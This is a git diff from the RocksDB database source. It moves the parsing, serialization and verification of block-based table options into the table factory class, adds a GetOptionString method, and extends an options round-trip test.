9e984f6e39e..5cf548fb9e2 100644 --- a/options/options_helper.cc +++ b/options/options_helper.cc @@ -21,6 +21,7 @@ #include "rocksdb/table.h" #include "table/block_based_table_factory.h" #include "table/plain_table_factory.h" +#include "util/cast_util.h" #include "util/string_util.h" namespace rocksdb { @@ -303,6 +304,7 @@ bool ParseSliceTransform( // SliceTransforms here. return false; } +} // anonymouse namespace bool ParseOptionHelper(char* opt_address, const OptionType& opt_type, const std::string& value) { @@ -383,8 +385,6 @@ bool ParseOptionHelper(char* opt_address, const OptionType& opt_type, return true; } -} // anonymouse namespace - bool SerializeSingleOptionHelper(const char* opt_address, const OptionType opt_type, std::string* value) { @@ -466,12 +466,14 @@ bool SerializeSingleOptionHelper(const char* opt_address, // Since the user-specified comparator will be wrapped by // InternalKeyComparator, we should persist the user-specified one // instead of InternalKeyComparator. - const auto* internal_comparator = - dynamic_cast(*ptr); - if (internal_comparator != nullptr) { - *value = internal_comparator->user_comparator()->Name(); + if (*ptr == nullptr) { + *value = kNullptrString; } else { - *value = *ptr ? (*ptr)->Name() : kNullptrString; + const Comparator* root_comp = (*ptr)->GetRootComparator(); + if (root_comp == nullptr) { + root_comp = (*ptr); + } + *value = root_comp->Name(); } break; } @@ -693,8 +695,9 @@ Status ParseColumnFamilyOption(const std::string& name, if (name == "block_based_table_factory") { // Nested options BlockBasedTableOptions table_opt, base_table_options; - auto block_based_table_factory = dynamic_cast( - new_options->table_factory.get()); + BlockBasedTableFactory* block_based_table_factory = + static_cast_with_check( + new_options->table_factory.get()); if (block_based_table_factory != nullptr) { base_table_options = block_based_table_factory->table_options(); } @@ -708,8 +711,9 @@ Status ParseColumnFamilyOption(const std::string& name, } else if (name == "plain_table_factory") { // Nested options PlainTableOptions table_opt, base_table_options; - auto plain_table_factory = dynamic_cast( - new_options->table_factory.get()); + PlainTableFactory* plain_table_factory = + static_cast_with_check( + new_options->table_factory.get()); if (plain_table_factory != nullptr) { base_table_options = plain_table_factory->table_options(); } @@ -909,59 +913,6 @@ std::vector GetSupportedCompressions() { return supported_compressions; } -bool SerializeSingleBlockBasedTableOption( - std::string* opt_string, const BlockBasedTableOptions& bbt_options, - const std::string& name, const std::string& delimiter) { - auto iter = block_based_table_type_info.find(name); - if (iter == block_based_table_type_info.end()) { - return false; - } - auto& opt_info = iter->second; - const char* opt_address = - reinterpret_cast(&bbt_options) + opt_info.offset; - std::string value; - bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value); - if (result) { - *opt_string = name + "=" + value + delimiter; - } - return result; -} - -Status GetStringFromBlockBasedTableOptions( - std::string* opt_string, const BlockBasedTableOptions& bbt_options, - const std::string& delimiter) { - assert(opt_string); - opt_string->clear(); - for (auto iter = block_based_table_type_info.begin(); - iter != block_based_table_type_info.end(); ++iter) { - if (iter->second.verification == OptionVerificationType::kDeprecated) { - // If the option is no longer used in rocksdb and marked as deprecated, 
- // we skip it in the serialization. - continue; - } - std::string single_output; - bool result = SerializeSingleBlockBasedTableOption( - &single_output, bbt_options, iter->first, delimiter); - assert(result); - if (result) { - opt_string->append(single_output); - } - } - return Status::OK(); -} - -Status GetStringFromTableFactory(std::string* opts_str, const TableFactory* tf, - const std::string& delimiter) { - const auto* bbtf = dynamic_cast(tf); - opts_str->clear(); - if (bbtf != nullptr) { - return GetStringFromBlockBasedTableOptions(opts_str, bbtf->table_options(), - delimiter); - } - - return Status::OK(); -} - Status ParseDBOption(const std::string& name, const std::string& org_value, DBOptions* new_options, @@ -1003,242 +954,6 @@ Status ParseDBOption(const std::string& name, return Status::OK(); } -std::string ParseBlockBasedTableOption(const std::string& name, - const std::string& org_value, - BlockBasedTableOptions* new_options, - bool input_strings_escaped = false, - bool ignore_unknown_options = false) { - const std::string& value = - input_strings_escaped ? UnescapeOptionString(org_value) : org_value; - if (!input_strings_escaped) { - // if the input string is not escaped, it means this function is - // invoked from SetOptions, which takes the old format. - if (name == "block_cache") { - new_options->block_cache = NewLRUCache(ParseSizeT(value)); - return ""; - } else if (name == "block_cache_compressed") { - new_options->block_cache_compressed = NewLRUCache(ParseSizeT(value)); - return ""; - } else if (name == "filter_policy") { - // Expect the following format - // bloomfilter:int:bool - const std::string kName = "bloomfilter:"; - if (value.compare(0, kName.size(), kName) != 0) { - return "Invalid filter policy name"; - } - size_t pos = value.find(':', kName.size()); - if (pos == std::string::npos) { - return "Invalid filter policy config, missing bits_per_key"; - } - int bits_per_key = - ParseInt(trim(value.substr(kName.size(), pos - kName.size()))); - bool use_block_based_builder = - ParseBoolean("use_block_based_builder", trim(value.substr(pos + 1))); - new_options->filter_policy.reset( - NewBloomFilterPolicy(bits_per_key, use_block_based_builder)); - return ""; - } - } - const auto iter = block_based_table_type_info.find(name); - if (iter == block_based_table_type_info.end()) { - if (ignore_unknown_options) { - return ""; - } else { - return "Unrecognized option"; - } - } - const auto& opt_info = iter->second; - if (opt_info.verification != OptionVerificationType::kDeprecated && - !ParseOptionHelper(reinterpret_cast(new_options) + opt_info.offset, - opt_info.type, value)) { - return "Invalid value"; - } - return ""; -} - -std::string ParsePlainTableOptions(const std::string& name, - const std::string& org_value, - PlainTableOptions* new_options, - bool input_strings_escaped = false, - bool ignore_unknown_options = false) { - const std::string& value = - input_strings_escaped ? 
UnescapeOptionString(org_value) : org_value; - const auto iter = plain_table_type_info.find(name); - if (iter == plain_table_type_info.end()) { - if (ignore_unknown_options) { - return ""; - } else { - return "Unrecognized option"; - } - } - const auto& opt_info = iter->second; - if (opt_info.verification != OptionVerificationType::kDeprecated && - !ParseOptionHelper(reinterpret_cast(new_options) + opt_info.offset, - opt_info.type, value)) { - return "Invalid value"; - } - return ""; -} - -Status GetBlockBasedTableOptionsFromMap( - const BlockBasedTableOptions& table_options, - const std::unordered_map& opts_map, - BlockBasedTableOptions* new_table_options, bool input_strings_escaped, - bool ignore_unknown_options) { - assert(new_table_options); - *new_table_options = table_options; - for (const auto& o : opts_map) { - auto error_message = ParseBlockBasedTableOption( - o.first, o.second, new_table_options, input_strings_escaped, - ignore_unknown_options); - if (error_message != "") { - const auto iter = block_based_table_type_info.find(o.first); - if (iter == block_based_table_type_info.end() || - !input_strings_escaped || // !input_strings_escaped indicates - // the old API, where everything is - // parsable. - (iter->second.verification != OptionVerificationType::kByName && - iter->second.verification != - OptionVerificationType::kByNameAllowNull && - iter->second.verification != - OptionVerificationType::kDeprecated)) { - // Restore "new_options" to the default "base_options". - *new_table_options = table_options; - return Status::InvalidArgument("Can't parse BlockBasedTableOptions:", - o.first + " " + error_message); - } - } - } - return Status::OK(); -} - -Status GetBlockBasedTableOptionsFromString( - const BlockBasedTableOptions& table_options, - const std::string& opts_str, - BlockBasedTableOptions* new_table_options) { - std::unordered_map opts_map; - Status s = StringToMap(opts_str, &opts_map); - if (!s.ok()) { - return s; - } - return GetBlockBasedTableOptionsFromMap(table_options, opts_map, - new_table_options); -} - -Status GetPlainTableOptionsFromMap( - const PlainTableOptions& table_options, - const std::unordered_map& opts_map, - PlainTableOptions* new_table_options, bool input_strings_escaped, - bool ignore_unknown_options) { - assert(new_table_options); - *new_table_options = table_options; - for (const auto& o : opts_map) { - auto error_message = ParsePlainTableOptions( - o.first, o.second, new_table_options, input_strings_escaped); - if (error_message != "") { - const auto iter = plain_table_type_info.find(o.first); - if (iter == plain_table_type_info.end() || - !input_strings_escaped || // !input_strings_escaped indicates - // the old API, where everything is - // parsable. - (iter->second.verification != OptionVerificationType::kByName && - iter->second.verification != - OptionVerificationType::kByNameAllowNull && - iter->second.verification != - OptionVerificationType::kDeprecated)) { - // Restore "new_options" to the default "base_options". 
- *new_table_options = table_options; - return Status::InvalidArgument("Can't parse PlainTableOptions:", - o.first + " " + error_message); - } - } - } - return Status::OK(); -} - -Status GetPlainTableOptionsFromString( - const PlainTableOptions& table_options, - const std::string& opts_str, - PlainTableOptions* new_table_options) { - std::unordered_map opts_map; - Status s = StringToMap(opts_str, &opts_map); - if (!s.ok()) { - return s; - } - return GetPlainTableOptionsFromMap(table_options, opts_map, - new_table_options); -} - -Status GetMemTableRepFactoryFromString(const std::string& opts_str, - std::unique_ptr* new_mem_factory) { - std::vector opts_list = StringSplit(opts_str, ':'); - size_t len = opts_list.size(); - - if (opts_list.size() <= 0 || opts_list.size() > 2) { - return Status::InvalidArgument("Can't parse memtable_factory option ", - opts_str); - } - - MemTableRepFactory* mem_factory = nullptr; - - if (opts_list[0] == "skip_list") { - // Expecting format - // skip_list: - if (2 == len) { - size_t lookahead = ParseSizeT(opts_list[1]); - mem_factory = new SkipListFactory(lookahead); - } else if (1 == len) { - mem_factory = new SkipListFactory(); - } - } else if (opts_list[0] == "prefix_hash") { - // Expecting format - // prfix_hash: - if (2 == len) { - size_t hash_bucket_count = ParseSizeT(opts_list[1]); - mem_factory = NewHashSkipListRepFactory(hash_bucket_count); - } else if (1 == len) { - mem_factory = NewHashSkipListRepFactory(); - } - } else if (opts_list[0] == "hash_linkedlist") { - // Expecting format - // hash_linkedlist: - if (2 == len) { - size_t hash_bucket_count = ParseSizeT(opts_list[1]); - mem_factory = NewHashLinkListRepFactory(hash_bucket_count); - } else if (1 == len) { - mem_factory = NewHashLinkListRepFactory(); - } - } else if (opts_list[0] == "vector") { - // Expecting format - // vector: - if (2 == len) { - size_t count = ParseSizeT(opts_list[1]); - mem_factory = new VectorRepFactory(count); - } else if (1 == len) { - mem_factory = new VectorRepFactory(); - } - } else if (opts_list[0] == "cuckoo") { - // Expecting format - // cuckoo: - if (2 == len) { - size_t write_buffer_size = ParseSizeT(opts_list[1]); - mem_factory= NewHashCuckooRepFactory(write_buffer_size); - } else if (1 == len) { - return Status::InvalidArgument("Can't parse memtable_factory option ", - opts_str); - } - } else { - return Status::InvalidArgument("Unrecognized memtable_factory option ", - opts_str); - } - - if (mem_factory != nullptr){ - new_mem_factory->reset(mem_factory); - } - - return Status::OK(); -} - Status GetColumnFamilyOptionsFromMap( const ColumnFamilyOptions& base_options, const std::unordered_map& opts_map, diff --git a/options/options_helper.h b/options/options_helper.h index b15faa74f75..95861203917 100644 --- a/options/options_helper.h +++ b/options/options_helper.h @@ -60,9 +60,6 @@ Status GetTableFactoryFromMap( std::shared_ptr* table_factory, bool ignore_unknown_options = false); -Status GetStringFromTableFactory(std::string* opts_str, const TableFactory* tf, - const std::string& delimiter = "; "); - enum class OptionType { kBoolean, kInt, @@ -580,109 +577,6 @@ static std::unordered_map cf_options_type_info = { {offset_of(&ColumnFamilyOptions::compaction_pri), OptionType::kCompactionPri, OptionVerificationType::kNormal, false, 0}}}; -static std::unordered_map - block_based_table_type_info = { - /* currently not supported - std::shared_ptr block_cache = nullptr; - std::shared_ptr block_cache_compressed = nullptr; - */ - {"flush_block_policy_factory", - 
{offsetof(struct BlockBasedTableOptions, flush_block_policy_factory), - OptionType::kFlushBlockPolicyFactory, OptionVerificationType::kByName, - false, 0}}, - {"cache_index_and_filter_blocks", - {offsetof(struct BlockBasedTableOptions, - cache_index_and_filter_blocks), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"cache_index_and_filter_blocks_with_high_priority", - {offsetof(struct BlockBasedTableOptions, - cache_index_and_filter_blocks_with_high_priority), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"pin_l0_filter_and_index_blocks_in_cache", - {offsetof(struct BlockBasedTableOptions, - pin_l0_filter_and_index_blocks_in_cache), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"index_type", - {offsetof(struct BlockBasedTableOptions, index_type), - OptionType::kBlockBasedTableIndexType, - OptionVerificationType::kNormal, false, 0}}, - {"hash_index_allow_collision", - {offsetof(struct BlockBasedTableOptions, hash_index_allow_collision), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"checksum", - {offsetof(struct BlockBasedTableOptions, checksum), - OptionType::kChecksumType, OptionVerificationType::kNormal, false, - 0}}, - {"no_block_cache", - {offsetof(struct BlockBasedTableOptions, no_block_cache), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"block_size", - {offsetof(struct BlockBasedTableOptions, block_size), - OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}, - {"block_size_deviation", - {offsetof(struct BlockBasedTableOptions, block_size_deviation), - OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, - {"block_restart_interval", - {offsetof(struct BlockBasedTableOptions, block_restart_interval), - OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, - {"index_block_restart_interval", - {offsetof(struct BlockBasedTableOptions, index_block_restart_interval), - OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, - {"index_per_partition", - {0, OptionType::kUInt64T, OptionVerificationType::kDeprecated, false, - 0}}, - {"metadata_block_size", - {offsetof(struct BlockBasedTableOptions, metadata_block_size), - OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}}, - {"partition_filters", - {offsetof(struct BlockBasedTableOptions, partition_filters), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"filter_policy", - {offsetof(struct BlockBasedTableOptions, filter_policy), - OptionType::kFilterPolicy, OptionVerificationType::kByName, false, - 0}}, - {"whole_key_filtering", - {offsetof(struct BlockBasedTableOptions, whole_key_filtering), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"skip_table_builder_flush", - {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, - 0}}, - {"format_version", - {offsetof(struct BlockBasedTableOptions, format_version), - OptionType::kUInt32T, OptionVerificationType::kNormal, false, 0}}, - {"verify_compression", - {offsetof(struct BlockBasedTableOptions, verify_compression), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"read_amp_bytes_per_bit", - {offsetof(struct BlockBasedTableOptions, read_amp_bytes_per_bit), - OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}}; - -static std::unordered_map plain_table_type_info = { - {"user_key_len", - {offsetof(struct PlainTableOptions, user_key_len), OptionType::kUInt32T, - OptionVerificationType::kNormal, false, 0}}, - 
{"bloom_bits_per_key", - {offsetof(struct PlainTableOptions, bloom_bits_per_key), OptionType::kInt, - OptionVerificationType::kNormal, false, 0}}, - {"hash_table_ratio", - {offsetof(struct PlainTableOptions, hash_table_ratio), OptionType::kDouble, - OptionVerificationType::kNormal, false, 0}}, - {"index_sparseness", - {offsetof(struct PlainTableOptions, index_sparseness), OptionType::kSizeT, - OptionVerificationType::kNormal, false, 0}}, - {"huge_page_tlb_size", - {offsetof(struct PlainTableOptions, huge_page_tlb_size), - OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}, - {"encoding_type", - {offsetof(struct PlainTableOptions, encoding_type), - OptionType::kEncodingType, OptionVerificationType::kByName, false, 0}}, - {"full_scan_mode", - {offsetof(struct PlainTableOptions, full_scan_mode), OptionType::kBoolean, - OptionVerificationType::kNormal, false, 0}}, - {"store_index_in_file", - {offsetof(struct PlainTableOptions, store_index_in_file), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}}; - static std::unordered_map compression_type_string_map = { {"kNoCompression", kNoCompression}, @@ -745,6 +639,12 @@ static std::unordered_map info_log_level_string_map = {"FATAL_LEVEL", InfoLogLevel::FATAL_LEVEL}, {"HEADER_LEVEL", InfoLogLevel::HEADER_LEVEL}}; +extern Status StringToMap( + const std::string& opts_str, + std::unordered_map* opts_map); + +extern bool ParseOptionHelper(char* opt_address, const OptionType& opt_type, + const std::string& value); #endif // !ROCKSDB_LITE } // namespace rocksdb diff --git a/options/options_parser.cc b/options/options_parser.cc index d5a3fec6ef0..2cb60a068ca 100644 --- a/options/options_parser.cc +++ b/options/options_parser.cc @@ -16,6 +16,7 @@ #include "options/options_helper.h" #include "rocksdb/convenience.h" #include "rocksdb/db.h" +#include "util/cast_util.h" #include "util/string_util.h" #include "util/sync_point.h" @@ -84,7 +85,8 @@ Status PersistRocksDBOptions(const DBOptions& db_opt, writable->Append("[" + opt_section_titles[kOptionSectionTableOptions] + tf->Name() + " \"" + EscapeOptionString(cf_names[i]) + "\"]\n "); - s = GetStringFromTableFactory(&options_file_content, tf, "\n "); + options_file_content.clear(); + s = tf->GetOptionString(&options_file_content, "\n "); if (!s.ok()) { return s; } @@ -507,6 +509,7 @@ namespace { bool AreEqualDoubles(const double a, const double b) { return (fabs(a - b) < 0.00001); } +} // namespace bool AreEqualOptions( const char* opt1, const char* opt2, const OptionTypeInfo& type_info, @@ -613,8 +616,6 @@ bool AreEqualOptions( } } -} // namespace - Status RocksDBOptionsParser::VerifyRocksDBOptionsFromFile( const DBOptions& db_opt, const std::vector& cf_names, const std::vector& cf_opts, @@ -762,59 +763,23 @@ Status RocksDBOptionsParser::VerifyCFOptions( return Status::OK(); } -Status RocksDBOptionsParser::VerifyBlockBasedTableFactory( - const BlockBasedTableFactory* base_tf, - const BlockBasedTableFactory* file_tf, - OptionsSanityCheckLevel sanity_check_level) { - if ((base_tf != nullptr) != (file_tf != nullptr) && - sanity_check_level > kSanityLevelNone) { - return Status::Corruption( - "[RocksDBOptionsParser]: Inconsistent TableFactory class type"); - } - if (base_tf == nullptr) { - return Status::OK(); - } - assert(file_tf != nullptr); - - const auto& base_opt = base_tf->table_options(); - const auto& file_opt = file_tf->table_options(); - - for (auto& pair : block_based_table_type_info) { - if (pair.second.verification == OptionVerificationType::kDeprecated) { - // We skip 
checking deprecated variables as they might - // contain random values since they might not be initialized - continue; - } - if (BBTOptionSanityCheckLevel(pair.first) <= sanity_check_level) { - if (!AreEqualOptions(reinterpret_cast(&base_opt), - reinterpret_cast(&file_opt), - pair.second, pair.first, nullptr)) { - return Status::Corruption( - "[RocksDBOptionsParser]: " - "failed the verification on BlockBasedTableOptions::", - pair.first); - } - } - } - return Status::OK(); -} - Status RocksDBOptionsParser::VerifyTableFactory( const TableFactory* base_tf, const TableFactory* file_tf, OptionsSanityCheckLevel sanity_check_level) { if (base_tf && file_tf) { if (sanity_check_level > kSanityLevelNone && - base_tf->Name() != file_tf->Name()) { + std::string(base_tf->Name()) != std::string(file_tf->Name())) { return Status::Corruption( "[RocksDBOptionsParser]: " "failed the verification on TableFactory->Name()"); } - auto s = VerifyBlockBasedTableFactory( - dynamic_cast(base_tf), - dynamic_cast(file_tf), - sanity_check_level); - if (!s.ok()) { - return s; + if (base_tf->Name() == BlockBasedTableFactory::kName) { + return VerifyBlockBasedTableFactory( + static_cast_with_check(base_tf), + static_cast_with_check(file_tf), + sanity_check_level); } // TODO(yhchiang): add checks for other table factory types } else { diff --git a/options/options_parser.h b/options/options_parser.h index cae3dbba9b4..5545c0b0fa8 100644 --- a/options/options_parser.h +++ b/options/options_parser.h @@ -38,6 +38,11 @@ Status PersistRocksDBOptions(const DBOptions& db_opt, const std::vector& cf_opts, const std::string& file_name, Env* env); +extern bool AreEqualOptions( + const char* opt1, const char* opt2, const OptionTypeInfo& type_info, + const std::string& opt_name, + const std::unordered_map* opt_map); + class RocksDBOptionsParser { public: explicit RocksDBOptionsParser(); @@ -86,11 +91,6 @@ class RocksDBOptionsParser { const TableFactory* base_tf, const TableFactory* file_tf, OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch); - static Status VerifyBlockBasedTableFactory( - const BlockBasedTableFactory* base_tf, - const BlockBasedTableFactory* file_tf, - OptionsSanityCheckLevel sanity_check_level); - static Status ExtraParserCheck(const RocksDBOptionsParser& input_parser); protected: diff --git a/options/options_test.cc b/options/options_test.cc index d5eb42b0906..fc4939beb41 100644 --- a/options/options_test.cc +++ b/options/options_test.cc @@ -889,11 +889,11 @@ TEST_F(OptionsTest, ConvertOptionsTest) { ASSERT_EQ(converted_opt.max_open_files, leveldb_opt.max_open_files); ASSERT_EQ(converted_opt.compression, leveldb_opt.compression); - std::shared_ptr table_factory = - std::dynamic_pointer_cast( - converted_opt.table_factory); + std::shared_ptr tb_guard = converted_opt.table_factory; + BlockBasedTableFactory* table_factory = + dynamic_cast(converted_opt.table_factory.get()); - ASSERT_TRUE(table_factory.get() != nullptr); + ASSERT_TRUE(table_factory != nullptr); const BlockBasedTableOptions table_opt = table_factory->table_options(); @@ -1278,6 +1278,11 @@ TEST_F(OptionsParserTest, DumpAndParse) { Random rnd(302); test::RandomInitDBOptions(&base_db_opt, &rnd); base_db_opt.db_log_dir += "/#odd #but #could #happen #path #/\\\\#OMG"; + + BlockBasedTableOptions special_bbto; + special_bbto.cache_index_and_filter_blocks = true; + special_bbto.block_size = 999999; + for (int c = 0; c < num_cf; ++c) { ColumnFamilyOptions cf_opt; Random cf_rnd(0xFB + c); @@ -1287,6 +1292,8 @@ TEST_F(OptionsParserTest, 
DumpAndParse) { } if (c < 3) { cf_opt.table_factory.reset(test::RandomTableFactory(&rnd, c)); + } else if (c == 4) { + cf_opt.table_factory.reset(NewBlockBasedTableFactory(special_bbto)); } base_cf_opts.emplace_back(cf_opt); } @@ -1298,6 +1305,15 @@ TEST_F(OptionsParserTest, DumpAndParse) { RocksDBOptionsParser parser; ASSERT_OK(parser.Parse(kOptionsFileName, env_.get())); + // Make sure block-based table factory options was deserialized correctly + std::shared_ptr ttf = (*parser.cf_opts())[4].table_factory; + ASSERT_EQ(BlockBasedTableFactory::kName, std::string(ttf->Name())); + const BlockBasedTableOptions& parsed_bbto = + static_cast(ttf.get())->table_options(); + ASSERT_EQ(special_bbto.block_size, parsed_bbto.block_size); + ASSERT_EQ(special_bbto.cache_index_and_filter_blocks, + parsed_bbto.cache_index_and_filter_blocks); + ASSERT_OK(RocksDBOptionsParser::VerifyRocksDBOptionsFromFile( base_db_opt, cf_names, base_cf_opts, kOptionsFileName, env_.get())); diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index 4705046bfeb..b4f8ba8a178 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -13,12 +13,15 @@ #include #include +#include "options/options_helper.h" #include "port/port.h" -#include "rocksdb/flush_block_policy.h" #include "rocksdb/cache.h" +#include "rocksdb/convenience.h" +#include "rocksdb/flush_block_policy.h" #include "table/block_based_table_builder.h" #include "table/block_based_table_reader.h" #include "table/format.h" +#include "util/string_util.h" namespace rocksdb { @@ -201,15 +204,203 @@ std::string BlockBasedTableFactory::GetPrintableTableOptions() const { return ret; } +#ifndef ROCKSDB_LITE +namespace { +bool SerializeSingleBlockBasedTableOption( + std::string* opt_string, const BlockBasedTableOptions& bbt_options, + const std::string& name, const std::string& delimiter) { + auto iter = block_based_table_type_info.find(name); + if (iter == block_based_table_type_info.end()) { + return false; + } + auto& opt_info = iter->second; + const char* opt_address = + reinterpret_cast(&bbt_options) + opt_info.offset; + std::string value; + bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value); + if (result) { + *opt_string = name + "=" + value + delimiter; + } + return result; +} +} // namespace + +Status BlockBasedTableFactory::GetOptionString( + std::string* opt_string, const std::string& delimiter) const { + assert(opt_string); + opt_string->clear(); + for (auto iter = block_based_table_type_info.begin(); + iter != block_based_table_type_info.end(); ++iter) { + if (iter->second.verification == OptionVerificationType::kDeprecated) { + // If the option is no longer used in rocksdb and marked as deprecated, + // we skip it in the serialization. 
+ continue; + } + std::string single_output; + bool result = SerializeSingleBlockBasedTableOption( + &single_output, table_options_, iter->first, delimiter); + assert(result); + if (result) { + opt_string->append(single_output); + } + } + return Status::OK(); +} +#else +Status BlockBasedTableFactory::GetOptionString( + std::string* opt_string, const std::string& delimiter) const { + return Status::OK(); +} +#endif // !ROCKSDB_LITE + const BlockBasedTableOptions& BlockBasedTableFactory::table_options() const { return table_options_; } +#ifndef ROCKSDB_LITE +namespace { +std::string ParseBlockBasedTableOption(const std::string& name, + const std::string& org_value, + BlockBasedTableOptions* new_options, + bool input_strings_escaped = false, + bool ignore_unknown_options = false) { + const std::string& value = + input_strings_escaped ? UnescapeOptionString(org_value) : org_value; + if (!input_strings_escaped) { + // if the input string is not escaped, it means this function is + // invoked from SetOptions, which takes the old format. + if (name == "block_cache") { + new_options->block_cache = NewLRUCache(ParseSizeT(value)); + return ""; + } else if (name == "block_cache_compressed") { + new_options->block_cache_compressed = NewLRUCache(ParseSizeT(value)); + return ""; + } else if (name == "filter_policy") { + // Expect the following format + // bloomfilter:int:bool + const std::string kName = "bloomfilter:"; + if (value.compare(0, kName.size(), kName) != 0) { + return "Invalid filter policy name"; + } + size_t pos = value.find(':', kName.size()); + if (pos == std::string::npos) { + return "Invalid filter policy config, missing bits_per_key"; + } + int bits_per_key = + ParseInt(trim(value.substr(kName.size(), pos - kName.size()))); + bool use_block_based_builder = + ParseBoolean("use_block_based_builder", trim(value.substr(pos + 1))); + new_options->filter_policy.reset( + NewBloomFilterPolicy(bits_per_key, use_block_based_builder)); + return ""; + } + } + const auto iter = block_based_table_type_info.find(name); + if (iter == block_based_table_type_info.end()) { + if (ignore_unknown_options) { + return ""; + } else { + return "Unrecognized option"; + } + } + const auto& opt_info = iter->second; + if (opt_info.verification != OptionVerificationType::kDeprecated && + !ParseOptionHelper(reinterpret_cast(new_options) + opt_info.offset, + opt_info.type, value)) { + return "Invalid value"; + } + return ""; +} +} // namespace + +Status GetBlockBasedTableOptionsFromString( + const BlockBasedTableOptions& table_options, const std::string& opts_str, + BlockBasedTableOptions* new_table_options) { + std::unordered_map opts_map; + Status s = StringToMap(opts_str, &opts_map); + if (!s.ok()) { + return s; + } + + return GetBlockBasedTableOptionsFromMap(table_options, opts_map, + new_table_options); +} + +Status GetBlockBasedTableOptionsFromMap( + const BlockBasedTableOptions& table_options, + const std::unordered_map& opts_map, + BlockBasedTableOptions* new_table_options, bool input_strings_escaped, + bool ignore_unknown_options) { + assert(new_table_options); + *new_table_options = table_options; + for (const auto& o : opts_map) { + auto error_message = ParseBlockBasedTableOption( + o.first, o.second, new_table_options, input_strings_escaped, + ignore_unknown_options); + if (error_message != "") { + const auto iter = block_based_table_type_info.find(o.first); + if (iter == block_based_table_type_info.end() || + !input_strings_escaped || // !input_strings_escaped indicates + // the old API, where everything 
is + // parsable. + (iter->second.verification != OptionVerificationType::kByName && + iter->second.verification != + OptionVerificationType::kByNameAllowNull && + iter->second.verification != OptionVerificationType::kDeprecated)) { + // Restore "new_options" to the default "base_options". + *new_table_options = table_options; + return Status::InvalidArgument("Can't parse BlockBasedTableOptions:", + o.first + " " + error_message); + } + } + } + return Status::OK(); +} + +Status VerifyBlockBasedTableFactory( + const BlockBasedTableFactory* base_tf, + const BlockBasedTableFactory* file_tf, + OptionsSanityCheckLevel sanity_check_level) { + if ((base_tf != nullptr) != (file_tf != nullptr) && + sanity_check_level > kSanityLevelNone) { + return Status::Corruption( + "[RocksDBOptionsParser]: Inconsistent TableFactory class type"); + } + if (base_tf == nullptr) { + return Status::OK(); + } + assert(file_tf != nullptr); + + const auto& base_opt = base_tf->table_options(); + const auto& file_opt = file_tf->table_options(); + + for (auto& pair : block_based_table_type_info) { + if (pair.second.verification == OptionVerificationType::kDeprecated) { + // We skip checking deprecated variables as they might + // contain random values since they might not be initialized + continue; + } + if (BBTOptionSanityCheckLevel(pair.first) <= sanity_check_level) { + if (!AreEqualOptions(reinterpret_cast(&base_opt), + reinterpret_cast(&file_opt), + pair.second, pair.first, nullptr)) { + return Status::Corruption( + "[RocksDBOptionsParser]: " + "failed the verification on BlockBasedTableOptions::", + pair.first); + } + } + } + return Status::OK(); +} +#endif // !ROCKSDB_LITE + TableFactory* NewBlockBasedTableFactory( const BlockBasedTableOptions& _table_options) { return new BlockBasedTableFactory(_table_options); } +const std::string BlockBasedTableFactory::kName = "BlockBasedTable"; const std::string BlockBasedTablePropertyNames::kIndexType = "rocksdb.block.based.table.index.type"; const std::string BlockBasedTablePropertyNames::kWholeKeyFiltering = diff --git a/table/block_based_table_factory.h b/table/block_based_table_factory.h index bdff00d1ee3..39e3eac0b37 100644 --- a/table/block_based_table_factory.h +++ b/table/block_based_table_factory.h @@ -13,9 +13,11 @@ #include #include +#include "db/dbformat.h" +#include "options/options_helper.h" +#include "options/options_parser.h" #include "rocksdb/flush_block_policy.h" #include "rocksdb/table.h" -#include "db/dbformat.h" namespace rocksdb { @@ -31,7 +33,7 @@ class BlockBasedTableFactory : public TableFactory { ~BlockBasedTableFactory() {} - const char* Name() const override { return "BlockBasedTable"; } + const char* Name() const override { return kName.c_str(); } Status NewTableReader( const TableReaderOptions& table_reader_options, @@ -49,12 +51,17 @@ class BlockBasedTableFactory : public TableFactory { std::string GetPrintableTableOptions() const override; + Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const override; + const BlockBasedTableOptions& table_options() const; void* GetOptions() override { return &table_options_; } bool IsDeleteRangeSupported() const override { return true; } + static const std::string kName; + private: BlockBasedTableOptions table_options_; }; @@ -64,4 +71,87 @@ extern const std::string kHashIndexPrefixesMetadataBlock; extern const std::string kPropTrue; extern const std::string kPropFalse; +#ifndef ROCKSDB_LITE +extern Status VerifyBlockBasedTableFactory( + const BlockBasedTableFactory* base_tf, + 
